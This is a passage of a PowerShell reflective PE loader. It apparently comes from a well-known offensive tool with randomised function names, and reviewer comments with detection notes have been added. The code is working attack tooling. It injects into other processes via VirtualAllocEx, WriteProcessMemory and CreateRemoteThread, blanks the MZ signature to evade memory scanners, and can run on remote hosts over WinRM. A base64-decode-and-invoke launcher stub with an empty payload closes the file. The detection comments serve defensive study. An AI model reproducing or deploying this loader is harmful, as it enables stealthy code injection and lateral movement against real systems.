  2416.                 $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
  2417.                 if ($RSCAddr -eq [IntPtr]::Zero)
  2418.                 {
  2419.                     Throw "Unable to allocate memory in the remote process for shellcode"
  2420.                 }
  2421.  
  2422.                 $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
  2423.                 if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
  2424.                 {
  2425.                     Throw "Unable to write shellcode to remote process memory."
  2426.                 }
  2427.  
  2428.                 $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
  2429.                 $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
  2430.                 if ($Result -ne 0)
  2431.                 {
  2432.                     Throw "Call to CreateRemoteThread to call GetProcAddress failed."
  2433.                 }
  2434.  
  2435.                 $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
  2436.             }
  2437.         }
  2438.         elseif ($PEInfo.FileType -ieq "EXE")
  2439.         {
  2440.  
  2441.             [IntPtr]$ExeDoneBytePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(1)
  2442.             [System.Runtime.InteropServices.Marshal]::WriteByte($ExeDoneBytePtr, 0, 0x00)
  2443.             $OverwrittenMemInfo = Update-ExeFunctions -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr
  2444.  
  2445.  
  2446.  
  2447.             [IntPtr]$ExeMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
  2448.             Write-Verbose "Call EXE Main function. Address: $(Get-Hex $ExeMainPtr). Creating thread for the EXE to run in."
  2449.  
  2450.             $Win32Functions.CreateThread.Invoke([IntPtr]::Zero, [IntPtr]::Zero, $ExeMainPtr, [IntPtr]::Zero, ([UInt32]0), [Ref]([UInt32]0)) | Out-Null
  2451.  
  2452.             while($true)
  2453.             {
  2454.                 [Byte]$ThreadDone = [System.Runtime.InteropServices.Marshal]::ReadByte($ExeDoneBytePtr, 0)
  2455.                 if ($ThreadDone -eq 1)
  2456.                 {
  2457.                     Copy-ArrayOfMemAddresses -CopyInfo $OverwrittenMemInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants
  2458.                     Write-Verbose "EXE thread has completed."
  2459.                     break
  2460.                 }
  2461.                 else
  2462.                 {
  2463.                     Start-Sleep -Seconds 1
  2464.                 }
  2465.             }
  2466.         }
  2467.  
  2468.         return @($PEInfo.PEHandle, $EffectivePEHandle)
  2469.     }
  2470.  
  2471.  
    <#
    .SYNOPSIS
    Unloads a PE that this (local) PowerShell process previously manually mapped at $PEHandle.

    .DESCRIPTION
    Walks the mapped image's import directory and calls FreeLibrary on every imported
    module, notifies the image's entry point with reason code 0 (DLL_PROCESS_DETACH),
    then releases the image memory with VirtualFree / MEM_RELEASE.
    Only the local-process case is handled here (VirtualFree, not VirtualFreeEx); there
    is no unload path for a copy that was written into a remote process.
    The entry point is invoked unconditionally -- there is no FileType check -- so this
    is presumably only meant for images loaded as DLLs (TODO confirm with callers).
    Every failure after header parsing is reported with Write-Warning and execution
    continues; nothing in this function throws.

    .PARAMETER PEHandle
    Base address of the manually mapped image in the current process.
    #>
    Function Invoke-MemoryFreeLibrary
    {
        Param(
        [Parameter(Position=0, Mandatory=$true)]
        [IntPtr]
        $PEHandle
        )


        $Win32Constants = Get-Win32Constants
        $Win32Functions = Get-Win32Functions
        $Win32Types = Get-Win32Types

        # Re-parse the headers from the mapped image itself rather than relying on any
        # PEInfo object the loader produced earlier.
        $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants


        if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)
        {
            [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)

            while ($true)
            {
                $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)


                # An all-zero IMAGE_IMPORT_DESCRIPTOR terminates the import table.
                if ($ImportDescriptor.Characteristics -eq 0 `
                        -and $ImportDescriptor.FirstThunk -eq 0 `
                        -and $ImportDescriptor.ForwarderChain -eq 0 `
                        -and $ImportDescriptor.Name -eq 0 `
                        -and $ImportDescriptor.TimeDateStamp -eq 0)
                {
                    Write-Verbose "Done unloading the libraries needed by the PE"
                    break
                }

                # The descriptor's Name field is an RVA to the ANSI module name inside the mapped image.
                $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi((Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name)))
                $ImportDllHandle = $Win32Functions.GetModuleHandle.Invoke($ImportDllPath)

                # NOTE(review): a delegate that returns IntPtr yields [IntPtr]::Zero on failure,
                # not $null, so this warning is unlikely to ever fire and FreeLibrary below is
                # then called with a zero handle -- confirm the delegate's return type in
                # Get-Win32Functions (not visible here).
                if ($ImportDllHandle -eq $null)
                {
                    Write-Warning "Error getting DLL handle in MemoryFreeLibrary, DLLName: $ImportDllPath. Continuing anyways" -WarningAction Continue
                }

                # Drops one loader reference per imported module; presumably this balances a
                # LoadLibrary performed by Import-DllImports while mapping (not visible here).
                $Success = $Win32Functions.FreeLibrary.Invoke($ImportDllHandle)
                if ($Success -eq $false)
                {
                    Write-Warning "Unable to free library: $ImportDllPath. Continuing anyways." -WarningAction Continue
                }

                $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))
            }
        }


        # Call the entry point as DllMain(hModule, 0 /* DLL_PROCESS_DETACH */, NULL).
        Write-Verbose "Calling dllmain so the DLL knows it is being unloaded"
        $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
        $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])
        $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)

        $DllMain.Invoke($PEInfo.PEHandle, 0, [IntPtr]::Zero) | Out-Null


        # Release the whole reservation; with MEM_RELEASE the size argument must be 0.
        $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)
        if ($Success -eq $false)
        {
            Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue
        }
    }
  2540.  
  2541.  
    <#
    .SYNOPSIS
    Entry point of the remote script block: resolves the Win32 helpers, optionally opens a
    target process, loads the PE, and dispatches the export selected by $FuncReturnType.

    .DESCRIPTION
    Reads the script block's parameters $PEBytes, $FuncReturnType, $ProcId, $ProcName and
    $ForceASLR, plus $ExeArgs from the enclosing scope.
    Flow:
      1. -ProcId and -ProcName are mutually exclusive; a name is resolved to exactly one PID.
      2. If a PID is known, OpenProcess is called with 0x001F0FFF (the classic
         PROCESS_ALL_ACCESS mask). Without a PID the image is mapped into this process.
      3. Invoke-MemoryLoadLibrary maps the image and returns (local handle, effective handle).
      4. Local DLL: call WStringFunc / StringFunc / VoidFunc and write the result.
         Remote DLL: rebase VoidFunc onto the remote image and run it on a remote thread.
         EXE: nothing more to do here; the loader already ran the entry point thread.
    Detection notes: the full-access OpenProcess on another process, followed by
    VirtualAllocEx / WriteProcessMemory / CreateRemoteThread from a PowerShell host, is the
    observable sequence of the remote path (e.g. Sysmon ProcessAccess, Event ID 10, and
    CreateRemoteThread, Event ID 8).
    Neither the process handle nor the remote thread handle is closed in this function.
    #>
    Function Main
    {
        $Win32Functions = Get-Win32Functions
        $Win32Types = Get-Win32Types
        $Win32Constants =  Get-Win32Constants

        $RemoteProcHandle = [IntPtr]::Zero


        # -ProcId and -ProcName are mutually exclusive.
        if (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne ""))
        {
            Throw "Can't supply a ProcId and ProcName, choose one or the other"
        }
        # Resolve a process name to a single PID; ambiguity is listed and aborted, never guessed.
        elseif ($ProcName -ne $null -and $ProcName -ne "")
        {
            $Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue)
            if ($Processes.Count -eq 0)
            {
                Throw "Can't find process $ProcName"
            }
            elseif ($Processes.Count -gt 1)
            {
                $ProcInfo = Get-Process | where { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId
                Write-Output $ProcInfo
                Throw "More than one instance of $ProcName found, please specify the process ID to inject in to."
            }
            else
            {
                $ProcId = $Processes[0].ID
            }
        }









        # 0x001F0FFF = STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xFFF, i.e. PROCESS_ALL_ACCESS
        # as defined before Vista. A PowerShell process requesting this on another process
        # is the earliest observable step of the remote path. The handle is never closed here.
        if (($ProcId -ne $null) -and ($ProcId -ne 0))
        {
            $RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId)
            if ($RemoteProcHandle -eq [IntPtr]::Zero)
            {
                Throw "Couldn't obtain the handle for process ID: $ProcId"
            }

            Write-Verbose "Got the handle for the remote process to inject in to"
        }



        # A zero handle means "map into this PowerShell process"; otherwise the loader also
        # writes the image into the opened target.
        Write-Verbose "Calling Invoke-MemoryLoadLibrary"
        $PEHandle = [IntPtr]::Zero
        if ($RemoteProcHandle -eq [IntPtr]::Zero)
        {
            $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -ForceASLR $ForceASLR
        }
        else
        {
            $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle -ForceASLR $ForceASLR
        }
        # NOTE(review): Invoke-MemoryLoadLibrary returns a two-element array, so "-eq" here
        # filters the array instead of testing a scalar and this branch is effectively never
        # taken; a failed load is relied on to throw inside the loader itself.
        if ($PELoadedInfo -eq [IntPtr]::Zero)
        {
            Throw "Unable to load PE, handle returned is NULL"
        }

        # [0] = base of the local copy, [1] = base in the target (same value when local).
        $PEHandle = $PELoadedInfo[0]
        $RemotePEHandle = $PELoadedInfo[1]



        $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
        # Local DLL: look up the export named by -FuncReturnType, call it through a delegate,
        # and marshal the returned pointer to a .NET string where applicable.
        if (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -eq [IntPtr]::Zero))
        {



            switch ($FuncReturnType)
            {
                'WString' {
                    Write-Verbose "Calling function with WString return type"
                    [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "WStringFunc"
                    if ($WStringFuncAddr -eq [IntPtr]::Zero)
                    {
                        Throw "Couldn't find function address."
                    }
                    $WStringFuncDelegate = Get-DelegateType @() ([IntPtr])
                    $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate)
                    [IntPtr]$OutputPtr = $WStringFunc.Invoke()
                    $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr)
                    Write-Output $Output
                }

                'String' {
                    Write-Verbose "Calling function with String return type"
                    [IntPtr]$StringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "StringFunc"
                    if ($StringFuncAddr -eq [IntPtr]::Zero)
                    {
                        Throw "Couldn't find function address."
                    }
                    $StringFuncDelegate = Get-DelegateType @() ([IntPtr])
                    $StringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($StringFuncAddr, $StringFuncDelegate)
                    [IntPtr]$OutputPtr = $StringFunc.Invoke()
                    $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($OutputPtr)
                    Write-Output $Output
                }

                'Void' {
                    Write-Verbose "Calling function with Void return type"
                    [IntPtr]$VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc"
                    # Unlike the WString/String cases, a missing VoidFunc is silently tolerated.
                    if ($VoidFuncAddr -eq [IntPtr]::Zero)
                    {

                    }
                    else
                    {
                    $VoidFuncDelegate = Get-DelegateType @() ([Void])
                    $VoidFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VoidFuncAddr, $VoidFuncDelegate)
                    $VoidFunc.Invoke() | Out-Null
                    }
                }
            }



        }

        # Remote DLL: VoidFunc is resolved in the local copy, converted to an RVA by
        # subtracting the local base, re-added to the remote base, and started as a thread
        # in the target. $FuncReturnType is ignored on this path.
        elseif (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -ne [IntPtr]::Zero))
        {
            $VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc"
            if (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero))
            {

            }
            else{
            $VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle
            $VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle


            # NOTE(review): the returned thread handle is neither waited on nor closed.
            $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions
            }
        }



        # Both branches are empty -- dead code. Presumably a removed cleanup step;
        # Invoke-MemoryFreeLibrary is defined above but is not called anywhere visible.
        if ($RemoteProcHandle -eq [IntPtr]::Zero -and $PEInfo.FileType -ieq "DLL")
        {

        }
        else
        {






        }

        Write-Verbose "Done!"
    }
  2705.  
    # Run the script block's entry point as soon as Invoke-Command evaluates the block.
    Main
  2707. }
  2708.  
  2709.  
<#
.SYNOPSIS
Entry point of Invoke-COVDQSQKASLYKYN: validates the PE buffer, prepares -ExeArgs and
runs $RemoteScriptBlock locally or, when -ComputerName is given, on the named hosts.

.DESCRIPTION
Reads the cmdlet parameters $PEBytes, $DoNotZeroMZ, $ExeArgs, $ComputerName,
$FuncReturnType, $ProcId, $ProcName and $ForceASLR, plus $RemoteScriptBlock and
$PSCmdlet from the enclosing scope. Mutates the caller's $PEBytes array in place
(see the -DoNotZeroMZ comment below) and reassigns $ExeArgs.
With -ComputerName the whole script block and the PE bytes are shipped to the target
over PowerShell remoting (WinRM), where script block logging (Event ID 4104) and the
WinRM operational log are the natural places to observe it.

.OUTPUTS
Whatever the script block writes (the DLL export's return value, verbose messages).

Throws 'PE is not a valid PE file.' when the buffer does not start with the "MZ" signature.
#>
Function Main
{
    # -Debug on the cmdlet is propagated as $DebugPreference for this scope.
    if (($PSCmdlet.MyInvocation.BoundParameters["Debug"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters["Debug"].IsPresent)
    {
        $DebugPreference  = "Continue"
    }

    Write-Verbose "PowerShell ProcessID: $PID"


    # The first two bytes, read as characters, must spell the DOS header signature.
    $e_magic = ($PEBytes[0..1] | % {[Char] $_}) -join ''

    if ($e_magic -ne 'MZ')
    {
        throw 'PE is not a valid PE file.'
    }

    # Unless -DoNotZeroMZ, blank the "MZ" signature in the buffer before it is mapped.
    # Presumably this is meant to defeat memory scanners that key on the two-byte DOS
    # signature at a region start; from the defensive side, detection of a manually
    # mapped image should therefore not rely on that signature alone.
    if (-not $DoNotZeroMZ) {


        $PEBytes[0] = 0
        $PEBytes[1] = 0
    }


    # "ReflectiveExe" becomes the first token of the command line handed to an EXE
    # payload; presumably it stands in for argv[0] (consumed by Update-ExeFunctions,
    # not visible here -- TODO confirm).
    if ($ExeArgs -ne $null -and $ExeArgs -ne '')
    {
        $ExeArgs = "ReflectiveExe $ExeArgs"
    }
    else
    {
        $ExeArgs = "ReflectiveExe"
    }

    # $ComputerName is [String[]], so "-imatch" filters the array rather than testing one
    # string; a $null or all-whitespace value keeps execution in this session, anything
    # else fans the same script block out to every named host via PSRemoting.
    if ($ComputerName -eq $null -or $ComputerName -imatch "^\s*$")
    {
        Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR)
    }
    else
    {
        Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) -ComputerName $ComputerName
    }
}
  2753.  
# Invoke the cmdlet body once all helpers and the remote script block are defined.
Main
  2755. }
  2756.  
<#
.SYNOPSIS
Launcher stub: decodes a base64-embedded PE and hands it to the loader defined above.

.DESCRIPTION
In this paste $PEBytes32 is an empty string, so the decoded array is empty and the
loader's [ValidateNotNullOrEmpty()] on -PEBytes rejects it before anything is mapped;
the actual payload has been stripped out of the sample.
The randomised names (Invoke-HGFXNPCQTZ, Invoke-COVDQSQKASLYKYN) look like automated
renaming of a well-known reflective loader, so defensive matching should key on the
API sequence the loader exercises (OpenProcess, VirtualAllocEx, WriteProcessMemory,
CreateRemoteThread, Marshal::GetDelegateForFunctionPointer) and on the base64-decode-
then-invoke pattern below rather than on these function names.
#>
function Invoke-HGFXNPCQTZ
{

# Placeholder for the base64-encoded PE image; empty in this copy.
$PEBytes32 = ""
[Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes32)
Invoke-COVDQSQKASLYKYN -PEBytes $PEBytes

}